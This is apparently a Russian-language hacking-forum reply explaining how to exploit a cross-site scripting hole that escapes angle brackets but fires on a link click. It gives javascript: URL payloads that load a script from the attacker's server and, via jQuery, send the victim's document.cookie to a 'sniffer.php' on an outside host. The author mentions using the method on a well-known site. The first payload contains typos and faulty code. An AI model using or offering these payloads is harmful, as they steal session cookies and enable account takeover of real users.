Тут угловые скобки заменяются html сущностями. Видать прогнали через функцию htmlspecialchars(). И тут судя по всему скрипт срабатывает по нажатию по ссылки. Нередкий тип уязвимости. Так как тэг скрипта фильтруется, то закачать сам скрипт извне не получится. Но можно попробовать динамически создать скрипт и присвоить ему урл скрипта, лежащего на нашем сервере. Что-то типа
code:
javascript:x=document.createElement('script');x=x.setAttribu te('src','тут урл скрипта');document.getElementsByTagName('he ad').appendChild(x);
Таким образом мы не используя угловые скобки создаем динамический скрипт и подключаем к нему ресурс. Также, если на странице используется jQuery, можно просто поспользоваться этим, прописав
code:
javascript:jQuery.get('http://yoursite.com/sniffer.php?'+document.cookie);
или
javascript:$.get('http://yoursite.com/sniffer.php?'+document.cookie);
При клике данный метод позволяет отправлять get запросы на любой домен в сети. Недавно именно данный метод использовал в xss на одном из известных сайтов. И даже видео снимал.
https://hpc.name/showthread.php?t=32341. Посмотри, там именно такого же рода уязвимость, что и у тебя.